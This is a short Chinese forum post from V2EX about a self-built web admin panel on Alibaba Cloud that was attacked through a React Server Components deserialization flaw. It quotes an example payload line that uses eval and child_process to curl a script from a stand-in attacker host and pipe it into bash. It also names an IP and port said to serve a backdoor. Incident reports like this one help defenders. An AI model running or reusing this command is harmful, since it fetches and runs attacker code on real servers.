前段时间用 CC 写了一个应用的 Web 管理后台并部署在阿里云,结果周末就遭遇了攻击。
React Server Components 的反序列化漏洞:
// 恶意 RSC payload 中可能包含的示例
eval('require("child_process").exec("curl http://attacker.com/python.sh | bash")')
python.sh python.sh 下载后门程序 119.45.243.154:8443) 这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.